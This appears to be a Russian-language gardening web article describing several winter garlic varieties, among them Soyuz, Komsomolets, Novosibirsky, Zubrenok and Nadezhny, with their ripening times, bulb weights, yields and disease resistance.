Озимый стрелкующийся чеснок Союз выведен совместными усилиями российских и белорусских селекционеров. Мощное растение, на которое приходится 7-9 темно-зеленых листьев (длиной 34 см). Выбрасывает стрелку с мелкими луковичками, бело-серого цвета. Образовывает крупную плотную луковицу. Сорт характеризуется такими биологическими свойствами:

  • срок созревания — среднепоздний;
  • луковица плоская;
  • цвет чешуек – темно-кремовый;
  • мякоть плотная;
  • средняя масса луковицы – 42-48 грамм;
  • количество зубчиков в головке – 5-9 штук;
  • вес одного зубка – 7-9 грамм;
  • урожайность – 0,4-0,7 кг/м 2 ;
  • вкус – полуострый.

Озимый сорт Союз пользуется большой популярностью. Выращивание данного вида чеснока дает стабильно хороший урожай.

Сорт отличается высокой сопротивляемостью к бактериальным заболеваниям. Обладает отличными вкусовыми свойствами, что делает его продуктом универсального назначения.

Озимый комсомолец

Данный сорт обладает высокой зимоустойчивостью, образовывает крупную, плоско-округлую головку. Обладает такими морфологическими характеристиками:

  • среднепоздний сорт;
  • стрелкующийся;
  • вегетационный период – 110-119 дней;
  • масса головки – 30-35 грамм;
  • число зубков в головке – 6-13;
  • цвет луковицы – грязно-серый с фиолетовым оттенком;
  • вкус острый.

Озимый чеснок Комсомолец отлично произрастает на суглинистых землях Подмосковья. Посадку желательно производить на открытых, солнечных участках, с такими культурами-предшественниками, как огурцы, капуста, бобовые.

Новосибирский

Высокоурожайный среднеспелый сорт, предназначенный для выращивания в средней полосе России. Основные характеристики:

  • очень ранний сорт;
  • плоскоокруглая форма головки;
  • масса луковицы – 20-25 грамм;
  • урожайность – 0,9-1,1 кг/м 2 ;
  • количество зубков в головке – 5-10 штук;
  • сроки созревания — 75-81 дней;
  • высокая лежкость;
  • устойчивость к бактериальным заболеваниям (фузариозу);
  • вкусовые качества – полуострый.

к оглавлению ↑

Зубренок

Неприхотливый сорт, отличающийся высокой урожайностью. Свойства сорта Зубренок:

  • раннеспелый;
  • стрелкующийся;
  • вес головки – 50-70 грамм;
  • округлая луковица;
  • урожайность – 1,1 кг/м 2 ;
  • число зубков в головке – 4-7 штук;
  • созревание – 87-99 дней;
  • длительного хранения;
  • устойчивость к фузариозным заболеваниям;
  • острый вкус.

к оглавлению ↑

Надежный

Озимый, морозоустойчивый сорт чеснока, универсального предназначения. Основные характеристики сорта Надежный:

  • среднеспелый;
  • срок созревания (от появления всходов до полегания листьев) – 99-122;
  • округло-плоская головка;
  • масса – 55-75 грамм;
  • окрас чешуек – белый с оттенком фиолетового;
  • цвет зубков – белый;
  • количество в головке – 4-7 штук;
  • вес зубков – 7-10 грамм;
  • насыщенно острый вкус;
  • урожайность – 1,0 – 1,3 кг/м 2 ;
  • отличная лежкость;
  • повышенная сопротивляемость к заболеваниям.

Здоровый, а главное высокий урожай – цель, к которой стремится каждый, кто занимается выращиванием чеснока.

Достичь конечного результата можно при помощи правильно подобранного посадочного материала. Для этого необходимо брать во внимание условия произрастания и время посадки.